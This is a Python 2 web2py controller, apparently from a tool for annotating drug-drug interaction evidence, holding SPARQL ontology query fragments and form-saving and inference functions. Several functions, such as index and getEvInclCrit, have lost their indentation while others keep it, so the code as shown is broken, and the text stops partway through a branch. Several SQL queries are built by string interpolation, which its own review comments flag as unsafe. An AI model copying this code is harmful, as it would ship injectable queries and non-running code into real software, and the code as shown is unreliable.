?gItem3 a efo:EFO_0000750. # genotype characterization
}
'''
### END of clinical trial instance query parts
### START of in vitro metabolism experiments
# Positive fragment: the assay realizes a concretization of an in vitro study design.
SPARQL_IN_VITRO_DESIGN = '''
?aItem obo:BFO_0000055 ?re. # assay realizes a realizable entity...
?re obo:RO_0000059 ?ivd. # ...that concretizes an entity
?ivd a obo:OBI_0001285. # ... that is an in vitro study design
'''
# BUG FIX: this fragment previously began with a bare "NOT EXISTS {", which is
# not valid SPARQL at the group-graph-pattern level (NOT EXISTS must appear in
# a FILTER or MINUS). Every sibling negative fragment in this module uses
# "FILTER NOT EXISTS { ... }", and so must this one.
SPARQL_NOT_IN_VITRO_DESIGN = '''
FILTER NOT EXISTS {
?aItem obo:BFO_0000055 ?re. # assay realizes a realizable entity...
?re obo:RO_0000059 ?ivd. # ...that concretizes an entity
?ivd a obo:OBI_0001285. # ... that is an in vitro study design
}
'''
# Metabolism-experiment fragments; each positive pattern below has a
# "FILTER NOT EXISTS" twin used when the reviewer answered "no".
SPARQL_METABOLISM_IDENTIFICATION = '''
?aItem obo:OBI_0000293 ?dItem1. # has specified input some ?dItem1
?dItem1 a obo:CHEBI_24431; # ?dItem1 a CHEBI chemical entity
obo:BFO_0000050 ?dp; # part of ?dp
obo:RO_0000056 ?mp. # participates in ?mp
?dp a obo:DRON_00000005. # ?dp is a drug product
?mp a obo:GO_0008152. # ?mp is a metabolic process
'''
SPARQL_NOT_METABOLISM_IDENTIFICATION = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?dItem1. # has specified input some ?dItem1
?dItem1 a obo:CHEBI_24431; # ?dItem1 a CHEBI chemical entity
obo:BFO_0000050 ?dp; # part of ?dp
obo:RO_0000056 ?mp. # participates in ?mp
?dp a obo:DRON_00000005. # ?dp is a drug product
?mp a obo:GO_0008152. # ?mp is a metabolic process
}
'''
SPARQL_METABOLISM_INHIBITION = '''
?aItem obo:OBI_0000293 ?dItem1. # has specified input some ?dItem1
?dItem1 a obo:CHEBI_24431; # ?dItem1 a CHEBI chemical entity
obo:BFO_0000050 ?dp; # part of ?dp
obo:RO_0000056 ?mp. # participates in ?mp
?dp a obo:DRON_00000005. # ?dp is a drug product
?mp a obo:GO_0009892. # ?mp is a negative regulation of metabolic process
'''
SPARQL_NOT_METABOLISM_INHIBITION = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?dItem1. # has specified input some ?dItem1
?dItem1 a obo:CHEBI_24431; # ?dItem1 a CHEBI chemical entity
obo:BFO_0000050 ?dp; # part of ?dp
obo:RO_0000056 ?mp. # participates in ?mp
?dp a obo:DRON_00000005. # ?dp is a drug product
?mp a obo:GO_0009892. # ?mp is a negative regulation of metabolic process
}
'''
SPARQL_INVOLVES_CYP450 = '''
?mp obo:RO_0000057 ?cyp. # ?mp has participant some ?cyp
?cyp a obo:CHEBI_38559.
'''
SPARQL_NOT_INVOLVES_CYP450 = '''
FILTER NOT EXISTS {
?mp obo:RO_0000057 ?cyp. # ?mp has participant some ?cyp
?cyp a obo:CHEBI_38559.
}
'''
SPARQL_INVOLVES_RECOMBINANT_SYSTEM = '''
?aItem obo:OBI_0000293 ?sysItem1. # has specified input some ?sysItem1
?sysItem1 a obo:CLO_0000031. # ?sysItem1 a cell line
'''
SPARQL_NOT_INVOLVES_RECOMBINANT_SYSTEM = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?sysItem1. # has specified input some ?sysItem1
?sysItem1 a obo:CLO_0000031. # ?sysItem1 a cell line
}
'''
SPARQL_INVOLVES_HUMAN_MICROSOMES = '''
?aItem obo:OBI_0000293 ?sysItem1. # has specified input some ?sysItem1
?sysItem1 a obo:OBI_0001479; # ?sysItem1 a tissue sample
obo:OBI_0000312 ?scp. # ?sysItem1 a specified output of ?scp
?scp a obo:OBI_0000659; # ?scp is a specimen collection process
obo:OBI_0000293 ?hs. # ?scp has specified input ?hs
#?hs a obo:NCBITaxon_9606. # ?hs of type Homo Sapiens
'''
SPARQL_NOT_INVOLVES_HUMAN_MICROSOMES = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?sysItem1. # has specified input some ?sysItem1
?sysItem1 a obo:OBI_0001479; # ?sysItem1 a tissue sample
obo:OBI_0000312 ?scp. # ?sysItem1 a specified output of ?scp
?scp a obo:OBI_0000659; # ?scp is a specimen collection process
obo:OBI_0000293 ?hs. # ?scp has specified input ?hs
#?hs a obo:NCBITaxon_9606. # ?hs of type Homo Sapiens
}
'''
SPARQL_INVOLVES_ANTIBODY_INHIBITOR = '''
?aItem obo:OBI_0000293 ?sysItem2. # has specified input some ?sysItem2
?sysItem2 a obo:GO_0042571; # ?sysItem2 a immunoglobulin complex, circulating
obo:RO_0000053 ?role. # ?sysItem2 is the bearer of ?role
?role a obo:CHEBI_35222. # ?role is an inhibitor
'''
SPARQL_NOT_INVOLVES_ANTIBODY_INHIBITOR = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?sysItem2. # has specified input some ?sysItem2
?sysItem2 a obo:GO_0042571; # ?sysItem2 a immunoglobulin complex, circulating
obo:RO_0000053 ?role. # ?sysItem2 is the bearer of ?role
?role a obo:CHEBI_35222. # ?role is an inhibitor
}
'''
SPARQL_INVOLVES_CHEMICAL_INHIBITOR = '''
?aItem obo:OBI_0000293 ?chemEnt. # has specified input some ?chemEnt
?chemEnt a obo:CHEBI_24431; # ?chemEnt a chemical entity
rdf:type [owl:complementOf obo:GO_0042571]; # ?chemEnt is not a immunoglobulin complex, circulating
obo:RO_0000053 ?role. # ?chemEn is the bearer of ?role
?role a obo:CHEBI_35222. # ?role is an inhibitor
'''
SPARQL_NOT_INVOLVES_CHEMICAL_INHIBITOR = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?chemEnt. # has specified input some ?chemEnt
?chemEnt a obo:CHEBI_24431; # ?chemEnt a chemical entity
rdf:type [owl:complementOf obo:GO_0042571]; # ?chemEnt is not a immunoglobulin complex, circulating
obo:RO_0000053 ?role. # ?chemEn is the bearer of ?role
?role a obo:CHEBI_35222. # ?role is an inhibitor
}
'''
### END of in vitro metabolism experiments
### START of in vitro transport experiments
# Transport-experiment fragments used by getInferredEvType().
SPARQL_EX_VIVO_DESIGN = '''
?aItem obo:BFO_0000055 ?re. # assay realizes a realizable entity...
?re obo:RO_0000059 ?ivd. # ...that concretizes an entity
?ivd a obo:OBI_0001211. # ... that is an ex vivo study design
'''
SPARQL_TRANSPORT_IDENTIFICATION = '''
?aItem obo:OBI_0000293 ?chemSubst1. # has specified input some ?chemSubst1
?chemSubst1 a obo:CHEBI_24431; # ?chemSubst1 a CHEBI chemical entity
obo:OBI_0000312 ?tp. # is specified output of ?tp
?tp a obo:GO_0098739; # ?tp is import across a plasma membrane
obo:RO_0000057 ?pt; # ?tp has participant some ?pt
obo:RO_0000057 ?chemSubst2. # ?tp has participant some ?chemSubst2
?pt a obo:CHEBI_36080. # ?pt a protein
?chemSubst2 a obo:CHEBI_24431; # ?chemSubst2 a CHEBI chemical entity
obo:BFO_0000050 ?dp. # part of ?dp
?dp a obo:DRON_00000005. # ?dp is a drug product
'''
SPARQL_TRANSPORT_INHIBITION = '''
?aItem obo:OBI_0000293 ?chemSubst1. # has specified input some ?chemSubst1
?chemSubst1 a obo:CHEBI_24431; # ?chemSubst1 a CHEBI chemical entity
obo:OBI_0000312 ?tp. # is specified output of ?tp
?tp a obo:GO_0032410; # ?tp is negative regulation of transporter activity
obo:RO_0000057 ?pt; # ?tp has participant some ?pt
obo:RO_0000057 ?chemSubst2. # ?tp has participant some ?chemSubst2
?pt a obo:CHEBI_36080. # ?pt a protein
?chemSubst2 a obo:CHEBI_24431; # ?chemSubst2 a CHEBI chemical entity
obo:BFO_0000050 ?dp. # part of ?dp
?dp a obo:DRON_00000005. # ?dp is a drug product
'''
SPARQL_OVEREXPRESSED_CELL_LINE = '''
?aItem obo:OBI_0000293 ?clc. # has specified input some ?clc
?clc a obo:CLO_0000001; # ?clc a cell line cell
obo:RO_0000056 ?ovx. # ?clc participates in ?ovx
?ovx a obo:INO_0000114. # ?ovx an overexpression
'''
SPARQL_NOT_OVEREXPRESSED_CELL_LINE = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?clc. # has specified input some ?clc
?clc a obo:CLO_0000001; # ?clc a cell line cell
obo:RO_0000056 ?ovx. # ?clc participates in ?ovx
?ovx a obo:INO_0000114. # ?ovx an overexpression
}
'''
SPARQL_CACO_2_CELL_LINE = '''
?aItem obo:OBI_0000293 ?cl. # has specified input some ?cl
?cl a obo:CLO_0002172. # ?cl a Caco 2 cell
'''
SPARQL_NOT_CACO_2_CELL_LINE = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?cl. # has specified input some ?cl
?cl a obo:CLO_0002172. # ?cl a Caco 2 cell
}
'''
SPARQL_OATP1B1 = '''
?pt a obo:PR_000015223. # ?pt is a solute carrier organic anion transporter family member 1B1
'''
SPARQL_NOT_OATP1B1 = '''
FILTER NOT EXISTS {
?pt a obo:PR_000015223. # ?pt is a solute carrier organic anion transporter family member 1B1
}
'''
SPARQL_OATP1B3 = '''
?pt a obo:PR_000015224. # ?pt is a solute carrier organic anion transporter family member 1B3
'''
SPARQL_NOT_OATP1B3 = '''
FILTER NOT EXISTS {
?pt a obo:PR_000015224. # ?pt is a solute carrier organic anion transporter family member 1B3
}
'''
SPARQL_P_GLYCOPROTEIN = '''
?pt a obo:PR_000001891. # ?pt is a multidrug resistance protein 1 (p-glycoprotein)
'''
SPARQL_NOT_P_GLYCOPROTEIN = '''
FILTER NOT EXISTS {
?pt a obo:PR_000001891. # ?pt is a multidrug resistance protein 1 (p-glycoprotein)
}
'''
### END of in vitro transport experiments
# this file is released under public domain and you can use without limitations
def index():
print "[INFO] form controller index..."
session.task_id = request.vars.task_id
if not session.task_id or not session.part_code:
print "[ERROR] participant code (%s) or task_id (%s) undefined!" % (session.part_code, session.task_id)
return
else:
print "participant (%s), task (%s)" % (session.part_code, session.task_id)
return dict()
# check if there is finished evidence type answers available to load
def loadEvidenceTypeQuestions():
    """Load a previously saved evidence-type form for this participant/task as JSON.

    Returns a JSON string with the form metadata and per-question answers;
    implicitly returns None when no saved form exists.
    NOTE(review): SQL is built with %-interpolation from session values --
    parameterized queries would be safer.
    """
    sql1 = "SELECT evf.id, e.mp_method, e.inferred_evidence_type, e.is_agree_with_inference, e.entered_evidence_type FROM evidence_type e LEFT JOIN evidence_type_form evf ON e.evidence_type_form_id = evf.id WHERE e.participant_code = '%s' AND e.task_id = '%s';" % (session.part_code, session.task_id)
    result = db.executesql(sql1)
    if result:
        ev_form_id, mp_method, inferred_ev, agree_inferred, entered_ev = result[0][0], result[0][1], result[0][2], result[0][3], result[0][4]
        print "[INFO] load mp_method (%s), ev form (%s)" % (mp_method, ev_form_id)
        jsonData = {"mp_method": mp_method, "inferred_evidence_type": inferred_ev, "is_agree_with_inference": agree_inferred, "entered_evidence_type": entered_ev, "questions": {}}
        sql2 = "SELECT evq.ui_code, evq.answer FROM evidence_type_form evf JOIN evidence_type_question evq ON evf.id = evq.evidence_type_form_id WHERE evf.id = '%s'" % ev_form_id
        questions = db.executesql(sql2)
        for (code, answer) in questions:
            jsonData["questions"][code] = answer
        return json.dumps(jsonData)
# check if there is finished inclusion criteria answers available to load
def loadInclusionCriteriaQuestions(ic_form_id, mp_method):
    """Load a previously saved inclusion-criteria form for this participant/task as JSON.

    NOTE(review): both parameters are immediately overwritten from the query
    result below, so the arguments are effectively unused -- confirm callers.
    Implicitly returns None when no saved form exists.
    """
    sql1 = "SELECT icf.id, e.mp_method, e.is_meet_inclusion_criteria, e.is_agree_with_ic_result, confidence, disagree_comment FROM evidence_type e LEFT JOIN icl_form icf ON e.icl_form_id = icf.id WHERE e.participant_code = '%s' AND e.task_id = '%s';" % (session.part_code, session.task_id)
    result = db.executesql(sql1)
    if result:
        ic_form_id, mp_method, ic_result, ic_agree, confidence, comment = result[0][0], result[0][1], result[0][2], result[0][3], result[0][4], result[0][5]
        print "[INFO] load mp_method (%s), ic form (%s)" % (mp_method, ic_form_id)
        jsonData = {"mp_method": mp_method, "is_meet_inclusion_criteria": ic_result, "is_agree_with_ic_result": ic_agree, "confidence": confidence, "disagree_comment": comment, "questions": {}}
        #sql2 = "SELECT evq.ui_code, evq.answer FROM evidence_type_form evf JOIN evidence_type_question evq ON evf.id = evq.evidence_type_form_id WHERE evf.id = '%s'" % ev_form_id
        sql2 = "SELECT icq.ui_code, icq.answer FROM icl_form icf JOIN icl_question icq ON icf.id = icq.icl_form_id WHERE icf.id = '%s'" % ic_form_id
        questions = db.executesql(sql2)
        for (code, answer) in questions:
            jsonData["questions"][code] = answer
        return json.dumps(jsonData)
## save evidence type questions to table evidence_type_form, evidence_type_question
def saveEvidenceTypeQuestions():
    """Persist the submitted evidence-type answers, run the inference query,
    and return a JavaScript snippet that reveals the inference result in the UI.
    """
    print '[INFO] form controller save evidence type questions'
    print request.vars
    if request.vars:
        session.mp_method = request.vars.evidencetype
        result = isEvidenceTypeFormExists()
        if not result: # task and form not exists
            ev_form_id = db.evidence_type_form.insert(is_started=True, is_finished=True)
            session.ev_form_id = ev_form_id
            saveEvidenceTypeQuestionsHelper(session.mp_method, request.vars, ev_form_id)
            # create evidence_type when assist with inference
            db.evidence_type.insert(task_id=session.task_id, participant_code=session.part_code, mp_method=session.mp_method, evidence_type_form_id=ev_form_id, is_started=True, is_finished=False)
        else: # task and form exists, just update questions
            ev_id, ev_form_id = result["id"], result["ev_form_id"]
            session.ev_form_id = ev_form_id
            session.mp_method = result["mp_method"]
            saveEvidenceTypeQuestionsHelper(session.mp_method, request.vars, ev_form_id)
        # evidence type inference
        # NOTE(review): original indentation was lost; the inference section is
        # assumed to run only when request.vars is non-empty -- confirm.
        ietTpl = getInferredEvType(request.vars)
        evType = ietTpl[0]
        if ietTpl[1] == "":
            ietDefandNotes = ""
        else:
            ietDefandNotes = "<i>Definition:</i> " + ietTpl[1]
            if ietTpl[2] != "":
                ietDefandNotes += "<br><i>Notes:</i> " + ietTpl[2]
        ietCount = ietTpl[3]
        ietUri = ietTpl[4]
        # More than one matching type means the answers were ambiguous;
        # replace the result with guidance text instead of a type name.
        if ietCount > 1:
            evType = " There are %s evidence types that match the specific values you entered. Please revise your selections or click the 'Disagree' button below to manually select an evidence type." % str(ietCount)
            ietDefandNotes = "<br><i>Suggestion:</i> The 'info' links next to each question provide definitions intended to help make selections."
        r = '$("#inferred-evidencetype-div").css("display","block");$("#agree-with-inferred-div").css("display","block");jQuery("#inferred-evidencetype").val("%s");jQuery("#inferred-evidencetype-uri").val("%s");jQuery("#inferred-evidencetype-def").html(" %s");$("#calculate").hide();' % (evType, ietUri, ietDefandNotes)
        return r
def isEvidenceTypeFormExists():
sql = "SELECT id, evidence_type_form_id, mp_method FROM evidence_type WHERE participant_code = '%s' AND task_id = '%s'" % (session.part_code, session.task_id)
result = db.executesql(sql)
print result
if result:
return {"id": result[0][0], "ev_form_id": result[0][1], "mp_method": result[0][2]}
return None
def saveEvidenceTypeQuestionsHelper(mp_method, data, ev_form_id):
if mp_method == "Clinical study":
insertEvQuestionsByCodes(global_ct_ev_qs_codes, data, ev_form_id)
elif mp_method == "Case Report":
insertEvQuestionsByCodes(global_cr_ev_qs_codes, data, ev_form_id)
elif mp_method == "Metabolic Experiment":
insertEvQuestionsByCodes(global_ex_mt_ev_qs_codes, data, ev_form_id)
elif mp_method == "Transport Experiment":
insertEvQuestionsByCodes(global_ex_tp_ev_qs_codes, data, ev_form_id)
else:
print "[ERROR] evidence type undefined (%s)" % mp_method
# insert question if not exists, otherwise update the answer
def insertEvQuestionsByCodes(ui_codes, data, ev_form_id):
    """Upsert one evidence_type_question row per known ui_code answered in data.

    NOTE(review): the SELECT builds SQL via %-interpolation; values here are
    app-controlled, but the DAL query API or parameterized SQL would be safer.
    """
    for code in ui_codes:
        if code in global_ev_qs_map:
            question, answer = global_ev_qs_map[code], data[code]
            if question and answer:
                sql = "SELECT id FROM evidence_type_question WHERE evidence_type_form_id = '%s' and ui_code = '%s'" % (ev_form_id, code)
                result = db.executesql(sql)
                if result:
                    # Row already exists: only refresh the answer.
                    ev_question_id = result[0][0]
                    db(db.evidence_type_question.id == int(ev_question_id)).update(answer=answer)
                else:
                    db.evidence_type_question.insert(evidence_type_form_id=ev_form_id, ui_code=code, question=question, answer=answer)
# save inferred evidence type
# show inclusion criteria questions
def agreeInferred():
    """Record that the reviewer accepted the inferred evidence type, then
    return JavaScript that swaps in the inclusion-criteria form."""
    print '[INFO] form controller save inferred evidence type...'
    db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(inferred_evidence_type = request.vars["inferred-evidencetype"], inferred_evidence_type_uri = request.vars["inferred-evidencetype-uri"], is_agree_with_inference = True)
    # Fetch the inclusion criteria for the accepted type (and its parents).
    incCritQL = getEvInclCrit(request.vars["inferred-evidencetype-uri"])
    # hide agree/disagree buttons, show inclusion criteria form
    print '[INFO] showing inclusion criteria for session.mp_method = ' + session.mp_method
    r = '$("#agree-with-inferred-div").css("display","none");showInclusionCriteriaByMethod("'+session.mp_method+'",%s);' % json.dumps(incCritQL)
    return r
# save inferred and entered evidence type
# show inclusion criteria questions
def saveEnteredAndInferred():
print '[INFO] form controller save inferred and entered evidence type...'
db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(inferred_evidence_type = request.vars["inferred-evidencetype"], entered_evidence_type = request.vars["entered-evidencetype"], is_agree_with_inference = False)
# hide agree/disagree buttons, show inclusion criteria form
r = '$("#agree-with-inferred-div").css("display","none");showInclusionCriteriaByMethod("'+session.mp_method+'");'
return r
## save inclusion criteria questions to table icl_form, icl_question
def saveInclusionCriteriaQuestions():
    """Persist the submitted inclusion-criteria answers, evaluate the overall
    result, and return JavaScript that reveals it in the UI."""
    print '[INFO] form controller save inclusion criteria questions...'
    print '[INFO] request.vars: %s' % request.vars
    session.mp_method = request.vars.confirmedEvType
    ic_form_id = db.icl_form.insert(is_started=True, is_finished=True)
    session.ic_form_id = ic_form_id
    saveInclusionCriteriaQuestionsHelper(session.mp_method, request.vars, ic_form_id)
    # Link the new form to this participant/task's evidence_type row.
    db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(icl_form_id = ic_form_id)
    # get inclusion criteria result
    ic_result_str = "No"
    ic_result = getInclusionCriteriaResult()
    if ic_result:
        ic_result_str = "Yes"
    db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(is_meet_inclusion_criteria = ic_result)
    r = '$("#ic-div").css("display","block");$("#agree-with-ic-div").css("display","block");jQuery("#ic-result").val("%s");$("#calculate").hide();' % ic_result_str
    return r
def saveInclusionCriteriaQuestionsHelper(mp_method, data, ic_form_id):
if mp_method == "Clinical study":
insertIcQuestionsByCodes(global_ct_ic_qs_codes, data, ic_form_id)
elif mp_method == "Case Report":
insertIcQuestionsByCodes(global_cr_ic_qs_codes, data, ic_form_id)
elif mp_method == "Metabolic Experiment":
insertIcQuestionsByCodes(global_ex_mt_ic_qs_codes, data, ic_form_id)
elif mp_method == "Transport Experiment":
insertIcQuestionsByCodes(global_ex_tp_ic_qs_codes, data, ic_form_id)
else:
print "[ERROR - saveInclusionCriteriaQuestionsHelper] evidence type undefined (%s)" % mp_method
def insertIcQuestionsByCodes(ui_codes, data, ic_form_id):
    """Insert one icl_question row per recognized ui_code that was answered in data."""
    for ui_code in ui_codes:
        # Skip codes we have no question text for.
        if ui_code not in global_ic_qs_map:
            continue
        question = global_ic_qs_map[ui_code]
        answer = data[ui_code]
        if question and answer:
            db.icl_question.insert(icl_form_id=ic_form_id, ui_code=ui_code, question=question, answer=answer)
# send sparql query to obtain all of the evidence inclusion criteria for the accepted evidence type and its parent classes
def getEvInclCrit(ev_type):
print "querying for all of the evidence inclusion criteria for the accepted evidence type and its parent classes: %s" % str(ev_type)
# set RDF store connection
tstore = SPARQLWrapper(SPARQL_HOST)
# start building the evidence type query
q = '''
PREFIX obo: <http://purl.obolibrary.org/obo/>
select distinct ?parEvType ?ic
where
{
{<%s> rdfs:subClassOf+ ?parEvType.
?parEvType <http://purl.obolibrary.org/obo/dideo.owl#DIDEO_EV_Inclusion_Criterion> ?ic.
}
UNION
{
OPTIONAL {
<%s> <http://purl.obolibrary.org/obo/dideo.owl#DIDEO_EV_Inclusion_Criterion> ?ic.
?parEvType <http://purl.obolibrary.org/obo/dideo.owl#DIDEO_EV_Inclusion_Criterion> ?ic.
}
}
}
''' % (ev_type.strip(),ev_type.strip())
print q
tstore.setQuery(q)
tstore.setReturnFormat(JSON)
qr = tstore.query().convert()
if len(qr["results"]["bindings"]) == 0:
print "results from sparql query is none "
evICRslt = "No inclusion criteria found!"
return None
# else, translate the returned IC into something presentable
print "results: %s" % qr
rgxSource = re.compile(r'Source:([^;]+);')
rgxLink = re.compile(r'Link:([^;]+);')
rgxId = re.compile(r'ID:([^;]+);')
rgxGroup = re.compile(r'Group:([^;]+);')
rgxAtag = re.compile(r'\((https://goo.gl/......)\) ')
incCritQL = []
for x in qr["results"]["bindings"]:
nd = {"icRaw":x["ic"]["value"]}
spltL = x["ic"]["value"].split('?')
if len(spltL) != 2:
print "ERROR: could not split on a question mark symbol - check the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icText"] = rgxAtag.sub(r'<a href="\1" target="new">\1</a> ', spltL[0].strip()) + '?'
m = rgxId.search(spltL[1])
if not m.group():
print "ERROR: could not extract ID from the annotation property. Check the format of the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icID"] = m.group(1).strip()
m = rgxGroup.search(spltL[1])
if not m.group():
print "ERROR: could not extract Group from the annotation property. Check the format of the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icGroup"] = m.group(1).strip()
m = rgxSource.search(spltL[1])
if not m.group():
print "ERROR: could not extract source reference from the annotation property. Check the format of the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icSourceRef"] = m.group(1).strip()
m = rgxLink.search(spltL[1])
if not m.group():
print "ERROR: could not extract reference link from the annotation property. Check the format of the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icSourceLink"] = m.group(1).strip()
incCritQL.append(nd)
# sort by Group
incCritQL.sort(key=lambda x:x["icGroup"])
print "Inclusion criteria after extracting metadata and sorting: %s" % incCritQL
return incCritQL
# send sparql query to virtuoso endpoint for specific evidence type inference
def getInferredEvType(data):
    """Infer the evidence type(s) matching a participant's questionnaire answers.

    Builds a SPARQL query incrementally from the answer dict ``data`` (keys are
    form field names such as 'cr-ev-question-1'; values are answer strings like
    'yes'/'no'/'unsure'), runs it against the Virtuoso endpoint, and folds the
    bindings into display strings.

    Args:
        data: dict of questionnaire answers (web2py request vars).

    Returns:
        tuple (etRslt, definition, inferenceNotes, evTypeCnt, uri) where
        etRslt/definition/uri are '-->'-joined strings for rows sharing the
        same evidence item, inferenceNotes collects user-facing caveats, and
        evTypeCnt is the number of result rows.

    NOTE(review): relies on module-level SPARQL_* fragments, SPARQLWrapper,
    JSON and SPARQL_HOST defined elsewhere in this controller. Python 2 code.
    """
    print "data as received by getInferredEvType: %s" % str(data)
    # notes to pass on to the user to help with explanations
    inferenceNotes = ""
    # set RDF store connection
    tstore = SPARQLWrapper(SPARQL_HOST)
    # start building the evidence type query
    q = SPARQL_PREFIXES + '''
SELECT distinct ?evItem ?evType ?label ?definition
''' + SPARQL_FROM_GRAPH + '''
WHERE {
 ?aItem a obo:OBI_0000070. # a study assay
'''
    # ---- Case report section ('cr-ev-*' answers) ----
    if not data.get('cr-ev-question-1'):
        print "INFO: skipping case report questions"
    else:
        q = q + SPARQL_OBSERVATIONAL_REPORT
        # adverse drug event report?
        if data['cr-ev-question-1'] == 'yes':
            q = q + SPARQL_ADVERSE_EVENT + SPARQL_PRECEDED_BY_DRUG_ADMIN
        elif data['cr-ev-question-1'] == 'no':
            q = q + SPARQL_NOT_ADVERSE_EVENT + SPARQL_NOT_PRECEDED_BY_DRUG_ADMIN
        elif data['cr-ev-question-1'] == 'unsure':
            # NOTE(review): 'unsure' is deliberately treated the same as 'no'
            q = q + SPARQL_NOT_ADVERSE_EVENT + SPARQL_NOT_PRECEDED_BY_DRUG_ADMIN
        # Publicly (spontaneously) reported?
        if data['cr-ev-question-2'] == 'yes':
            q = q + SPARQL_REPORT_IN_PUBLIC_DATABASE
        elif data['cr-ev-question-2'] == 'no':
            q = q + SPARQL_REPORT_NOT_IN_PUBLIC_DATABASE
        # Involves a suspected drug-drug interaction?
        if data['cr-ev-question-4'] == 'yes':
            q = q + SPARQL_DDI_ROLES
        elif data['cr-ev-question-4'] == 'no':
            q = q + SPARQL_NOT_DDI_ROLES
        # Was an evaluation of adverse event causality conducted?
        if data['cr-ev-question-3'] == 'yes':
            q = q + SPARQL_REPORT_EVALUATED_FOR_CAUSALITY
        elif data['cr-ev-question-3'] == 'no':
            q = q + SPARQL_REPORT_NOT_EVALUATED_FOR_CAUSALITY
    # ---- Clinical trial section ('ct-ev-*' answers) ----
    if not data.get('ct-ev-question-1'):
        print "INFO: skipping clinical trial questions"
    else:
        # randomization?
        if data['ct-ev-question-1'] == 'yes':
            q = q + SPARQL_RANDOMIZATION
        elif data['ct-ev-question-1'] == 'no':
            q = q + SPARQL_NO_RANDOMIZATION
        # parallel group design? -- TODO: as defined, there will be no types with both group randomziation AND a parallel groups design. Should we make the q1 and q2 radio buttons work so that users can't select that option
        if data['ct-ev-question-2'] == 'yes':
            q = q + SPARQL_PAR_GROUPS
        elif data['ct-ev-question-2'] == 'no':
            q = q + SPARQL_NOT_PAR_GROUPS
        # examining pharmacokinetics?
        if data['ct-ev-question-3'] == 'yes':
            q = q + SPARQL_PK
            # PK study definitions ignore randomization and group design, so
            # strip any clauses added above and explain why to the user.
            if data['ct-ev-question-1'] == 'yes':
                q = q.replace(SPARQL_RANDOMIZATION,'')
                inferenceNotes += " Randomization is currently ignored in the definition of pharmacokinetic studies. "
            elif data['ct-ev-question-1'] == 'no':
                q = q.replace(SPARQL_NO_RANDOMIZATION,'')
                inferenceNotes += " Randomization is currently ignored in the definition of pharmacokinetic studies. "
            if data['ct-ev-question-2'] == 'yes':
                q = q.replace(SPARQL_PAR_GROUPS,'')
                inferenceNotes += " Patient group assignment (e.g., parallel vs non-parallel) is currently ignored in the definition of pharmacokinetic studies. "
            elif data['ct-ev-question-2'] == 'no':
                q = q.replace(SPARQL_NOT_PAR_GROUPS,'')
                inferenceNotes += " Patient group assignment (e.g., parallel vs non-parallel) is currently ignored in the definition of pharmacokinetic studies. "
        elif data['ct-ev-question-3'] == 'no':
            q = q + SPARQL_NOT_PK
        # phenotyping done as part of the study?
        if data['ct-ev-question-4'] == 'yes':
            # phenotyping is a defining feature of PK studies but not DDI studies (TODO: consider changing this in the ev type definitions)
            if data['ct-ev-question-3'] == 'yes':
                q = q + SPARQL_PHENOTYPE
            else:
                inferenceNotes += " Questions will be included to help you assess the phenotyping aspect of the study. "
        elif data['ct-ev-question-4'] == 'no':
            q = q + SPARQL_NOT_PHENOTYPE
        # genotyping done as part of the study?
        if data['ct-ev-question-5'] == 'yes':
            # genotyping is a defining feature of PK studies but not DDI studies (TODO: consider changing this in the ev type definitions)
            if data['ct-ev-question-3'] == 'yes':
                q = q + SPARQL_GENOTYPE
            else:
                inferenceNotes += " Questions will be included to help you assess the genotyping aspect of the study. "
        elif data['ct-ev-question-5'] == 'no':
            q = q + SPARQL_NOT_GENOTYPE
    # ---- In vitro metabolism section ('ex-ev-mt-*' answers) ----
    if not data.get('ex-ev-mt-question-1'):
        print "INFO: skipping in vitro metabolic questions"
    else:
        q = q + SPARQL_IN_VITRO_DESIGN
        if data['ex-ev-mt-question-1'] == 'inhibition':
            q = q + SPARQL_METABOLISM_INHIBITION
        elif data['ex-ev-mt-question-1'] == 'identification':
            q = q + SPARQL_METABOLISM_IDENTIFICATION
        if data['ex-ev-mt-question-4'] == 'yes':
            q = q + SPARQL_INVOLVES_CYP450
        elif data['ex-ev-mt-question-4'] == 'no':
            q = q + SPARQL_NOT_INVOLVES_CYP450
        if data['ex-ev-mt-question-2'] == 'humanTissue':
            if data['ex-ev-mt-question-4'] == 'no':
                inferenceNotes += " Questions will be included to help you assess the use of human tissue in a metabolic mechanism identification experiment that are NOT focused on CYP450 enzymes."
            else:
                q = q + SPARQL_INVOLVES_HUMAN_MICROSOMES
        elif data['ex-ev-mt-question-2'] == 'cellLine':
            if data['ex-ev-mt-question-4'] == 'no':
                inferenceNotes += " Questions will be included to help you assess the use of recombinant cell lines in a metabolic mechanism identification experiment that are NOT focused on CYP450 enzymes."
            else:
                q = q + SPARQL_INVOLVES_RECOMBINANT_SYSTEM
        if data['ex-ev-mt-question-3'] == 'antibody':
            if data['ex-ev-mt-question-1'] != 'identification':
                q = q + SPARQL_INVOLVES_ANTIBODY_INHIBITOR
                if data['ex-ev-mt-question-4'] == 'yes' and data['ex-ev-mt-question-2'] == 'unsure':
                    inferenceNotes += " The evidence type ontology requires that CYP450 inhibition studies specify either human tissues or recombinant cell lines."
                if data['ex-ev-mt-question-1'] == 'inhibition':
                    inferenceNotes += " You selected that the mechanistic focus of the experiment is 'inhibition'. The evidence type ontology assumes that the use antibody inhibition applies only to metabolism mechanism identification experiments."
            else:
                q = q + SPARQL_NOT_INVOLVES_ANTIBODY_INHIBITOR + SPARQL_NOT_INVOLVES_CHEMICAL_INHIBITOR
                inferenceNotes += " Questions will be included to help you assess the use of an antibody inhibitor in a metabolic mechanism identification experiment."
        elif data['ex-ev-mt-question-3'] == 'chemical':
